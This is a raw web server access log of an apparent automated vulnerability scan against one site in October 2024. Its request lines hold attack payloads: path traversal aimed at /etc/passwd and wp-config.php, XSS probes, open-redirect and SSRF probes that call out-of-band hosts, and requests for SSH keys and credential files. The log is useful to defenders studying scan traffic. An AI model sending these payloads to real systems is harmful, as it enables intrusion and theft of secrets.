195.164.49.69 - - [20/Oct/2024:20:54:23 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:20:54:23 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:54:24 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:54:24 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:20:54:24 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:54:24 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:54:24 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:20:54:24 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:20:54:24 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:54:29 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:54:29 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:20:54:29 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:20:54:30 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:54:32 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:54:37 +0000] GET /wp-content/plugins/wordfence/readme.txt HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:54:39 +0000] GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:54:40 +0000] GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:55:21 +0000] GET /?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&sort=latest&page=index.php&format=xml&task=showproducts&view=med&sortdir=descgt5po%3Cimg%20src=a%20onerror=alert(document.domain)%3Evh217 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:55:23 +0000] GET /search.htm?searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:55:25 +0000] GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:55:27 +0000] GET /cgi-bin/mj_wwwusr?passw&list=GLOBAL&user&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1 404 1095
83.212.98.101 - - [20/Oct/2024:20:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:55:49 +0000] GET /php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:55:51 +0000] GET /ads/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:55:53 +0000] GET /adserve/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:20:55:55 +0000] GET /adserver/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:20:55:57 +0000] GET /openx/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:55:58 +0000] GET /revive/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:56:00 +0000] GET /www/delivery/lg.php?dest=http://interact.sh HTTP/1.1 404 1101
- - - [20/Oct/2024:20:56:03 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:56:04 +0000] GET /install/froxlor.sql HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:56:07 +0000] GET /_debug_toolbar/ HTTP/1.1 404 1093
- - - [20/Oct/2024:20:56:09 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:56:11 +0000] GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:56:32 +0000] GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1 404 1083
- - - [20/Oct/2024:20:56:54 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:57:16 +0000] GET /%5cgoogle.com/evil.html HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:57:18 +0000] GET /index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:57:20 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
83.212.98.101 - - [20/Oct/2024:20:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:57:41 +0000] GET /docker-compose.yml HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:20:57:43 +0000] GET /docker-compose.prod.yml HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:57:45 +0000] GET /docker-compose.production.yml HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:57:47 +0000] GET /docker-compose.staging.yml HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:57:49 +0000] GET /docker-compose.dev.yml HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:57:51 +0000] GET /docker-compose-dev.yml HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:57:53 +0000] GET /docker-compose.override.yml HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:57:55 +0000] GET /.vscode/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:57:57 +0000] GET /xmldata?item=CpqKey HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:20:57:59 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:58:01 +0000] GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:58:23 +0000] GET /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
- - - [20/Oct/2024:20:58:44 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:58:46 +0000] GET /index.php?redirect=//interact.sh HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:58:49 +0000] GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1 404 1138
195.164.49.69 - - [20/Oct/2024:20:58:50 +0000] GET /?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:59:11 +0000] GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 400 1169
- - - [20/Oct/2024:20:59:13 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:59:15 +0000] GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:20:59:17 +0000] GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:59:19 +0000] GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:21:00:00 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:00:01 +0000] GET /containers/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:00:04 +0000] GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:21:00:26 +0000] GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1111
83.212.98.101 - - [20/Oct/2024:21:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:21:00:47 +0000] GET /html/common/forward_js.jsp?FORWARD_URL=http://oast.me HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:21:00:49 +0000] GET /html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:21:00:51 +0000] GET /_src HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:21:00:53 +0000] GET /user.ini HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:00:55 +0000] GET /.user.ini HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:00:57 +0000] GET /?wptouch_switch=desktop&redirect=http://interact.sh HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:00:59 +0000] GET /webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password&_a%5bsignup%5d=1 HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:01:01 +0000] GET /?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:01:03 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:21:01:05 +0000] GET /inc/supportLoad.asp?urlToLoad=http://oast.me HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:01:07 +0000] GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:21:01:09 +0000] GET /system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh HTTP/1.1 404 1159
195.164.49.69 - - [20/Oct/2024:21:01:11 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:01:13 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:01:15 +0000] GET /elmah HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:01:17 +0000] GET /elmah.axd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:01:19 +0000] GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:01:41 +0000] GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 200 11204
- - - [20/Oct/2024:21:01:43 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:21:01:45 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:21:01:47 +0000] GET /appspec.yml HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:01:49 +0000] GET /appspec.yaml HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:01:51 +0000] GET /_vti_bin/lists.asmx?WSDL HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:01:53 +0000] GET /.ssh/authorized_keys HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:01:55 +0000] GET /_/.ssh/authorized_keys HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:01:57 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:01:59 +0000] GET //interact.sh/%2f.. HTTP/1.1 400 1169
- - - [20/Oct/2024:21:02:21 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:21:02:23 +0000] GET /friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model HTTP/1.1 404 1167
195.164.49.69 - - [20/Oct/2024:21:02:25 +0000] GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/ HTTP/1.1 404 1107
83.212.98.101 - - [20/Oct/2024:21:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:21:02:27 +0000] GET /bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale&text=objcontent%3Aemail* HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:21:02:29 +0000] GET /xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale&text=objcontent%3Aemail* HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:21:02:31 +0000] GET /config/default.json HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:02:33 +0000] GET /config.json HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:02:35 +0000] GET /config/config.json HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:02:37 +0000] GET /credentials/config.json HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:02:39 +0000] GET /StudioServer/server/wwtest/phpinfo.php HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:21:02:41 +0000] GET /server/wwtest/phpinfo.php HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:02:43 +0000] GET /plesk-stat/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:02:45 +0000] GET /OA_HTML/bin/sqlnet.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:02:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:02:49 +0000] GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1138
195.164.49.69 - - [20/Oct/2024:21:02:51 +0000] GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1138
195.164.49.69 - - [20/Oct/2024:21:02:53 +0000] GET /index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:02:55 +0000] GET /index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:02:57 +0000] GET /furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1 HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:21:02:59 +0000] GET /watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1 HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:21:03:40 +0000] GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:21:03:42 +0000] GET /?s=rGkD6l%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/WYF/ HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:03:44 +0000] GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:03:46 +0000] GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 404 1110
77.87.163.227 - - [20/Oct/2024:21:04:09 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [20/Oct/2024:21:04:27 +0000] GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName&redirect=%2f%5cinteract.sh HTTP/1.1 404 1109
- - - [20/Oct/2024:21:04:29 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:21:04:31 +0000] GET /rootDesc.xml HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:04:33 +0000] GET /?aiowpsec_do_log_out=1&after_logout=https://interact.sh HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:04:35 +0000] GET /signin?from=https://interact.sh HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:21:04:37 +0000] GET /signin?from=javascript:alert(document.cookie) HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:21:04:40 +0000] GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:04:42 +0000] GET /signup HTTP/1.1 404 1080
- - - [20/Oct/2024:21:04:44 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:21:04:46 +0000] GET /wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt HTTP/1.1 404 1154
195.164.49.69 - - [20/Oct/2024:21:04:48 +0000] GET /airflow.cfg HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:04:50 +0000] GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:05:11 +0000] GET /conf HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:21:05:13 +0000] GET /typo3/install.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:05:15 +0000] GET /file=https://oast.me HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:05:17 +0000] GET /azuredeploy.json HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:05:20 +0000] GET /npm-debug.log HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:21:05:21 +0000] GET /assets/npm-debug.log HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:05:24 +0000] GET /v2/_catalog HTTP/1.1 404 1089
- - - [20/Oct/2024:21:05:26 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:21:05:28 +0000] GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Fsdc.iopan.pl:443%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:05:29 +0000] GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:05:32 +0000] GET /xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain) HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:21:05:34 +0000] GET /bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain) HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:21:05:38 +0000] GET /api/version HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:05:39 +0000] GET /api/v1/settings HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:05:42 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:05:44 +0000] GET /netflow/jspui/NetworkSnapShot.jsp HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:21:05:46 +0000] GET /v1/sys/health HTTP/1.1 404 1095
83.212.98.101 - - [20/Oct/2024:21:05:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:21:05:48 +0000] GET /ui/vault/auth HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:05:50 +0000] GET /ui/auth HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:05:51 +0000] GET /v1/sys/health?help=1 HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:06:34 +0000] GET /admin/error.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:06:35 +0000] GET /error.log HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:06:35 +0000] GET /error.txt HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:06:35 +0000] GET /error_log.txt HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:21:06:35 +0000] GET /error/error.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:06:35 +0000] GET /error_log HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:06:35 +0000] GET /errors.txt HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:06:35 +0000] GET /errors.log HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:06:36 +0000] GET /errors/errors.log HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:06:36 +0000] GET /log.log HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:06:36 +0000] GET /errors_log HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:06:36 +0000] GET /log/error.log HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:21:06:36 +0000] GET /log.txt HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:06:37 +0000] GET /MyErrors.log HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:06:38 +0000] GET /logs/error.log HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:06:38 +0000] GET /log/errors.log HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:06:38 +0000] GET /logs.txt HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:06:38 +0000] GET /admin/logs/errors.log HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:21:06:38 +0000] GET /admin/errors.log HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:06:39 +0000] GET /admin/log/error.log HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:06:39 +0000] GET /admin/logs/error.log HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:06:40 +0000] GET /php_errors.log HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:06:41 +0000] GET /application/logs/application.log HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:21:06:41 +0000] GET /application/logs/default.log HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:21:06:41 +0000] GET /config/error_log HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:06:50 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:06:50 +0000] GET /routes/error_log HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:06:50 +0000] GET /sdc.iopan.pl:443/error.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:06:50 +0000] GET /sdc.iopan.pl:443/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:06:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:06:53 +0000] GET /euweb/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:06:56 +0000] GET /auth/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:06:58 +0000] GET /telescope/requests HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:07:00 +0000] GET /ui/login HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:07:02 +0000] GET /access.log HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:07:04 +0000] GET /log/access.log HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:07:06 +0000] GET /logs/access.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:07:08 +0000] GET /application/logs/access.log HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:21:07:10 +0000] GET /downloader.log HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:07:12 +0000] GET /+CSCOE+/logon.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:07:14 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:07:16 +0000] GET /clusters/local HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:07:18 +0000] GET /QSA/Login.aspx HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:07:20 +0000] GET /API/External/GetPrivacy HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:07:22 +0000] GET /currentsetting.htm HTTP/1.1 404 1092
83.212.98.101 - - [20/Oct/2024:21:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:21:07:29 +0000] GET /solr/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:07:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:07:33 +0000] GET /admin/spider.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:07:35 +0000] GET /sphider/admin/admin.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:07:37 +0000] GET /search/admin/admin.php HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:21:07:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:07:41 +0000] GET /teampass HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:07:44 +0000] GET /welcome HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:07:46 +0000] GET /webmail/login/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:07:48 +0000] GET /templates/login.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:07:50 +0000] GET /lam/templates/login.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:07:53 +0000] GET /storage/logs/laravel.log HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:21:07:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:07:56 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:07:58 +0000] GET /static/img/icons/favicon-32x32.png HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:21:08:01 +0000] GET /www/admin/index.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:08:02 +0000] GET /admin/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:08:05 +0000] GET /cgi-bin/sqwebmail HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:08:07 +0000] GET /cgi-bin/webmail HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:08:09 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:08:10 +0000] GET /sidekiq HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:08:13 +0000] GET /home HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:21:08:15 +0000] GET /static/shards.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:08:17 +0000] GET /static/shards/html HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:21:08:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:08:21 +0000] GET /front/privateLogin.jsp HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:21:08:23 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:08:25 +0000] GET /openvpn-monitor/ HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:08:27 +0000] GET /debug/pprof/heap?debug=1 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:08:29 +0000] GET /pprof/heap?debug=1 HTTP/1.1 404 1088
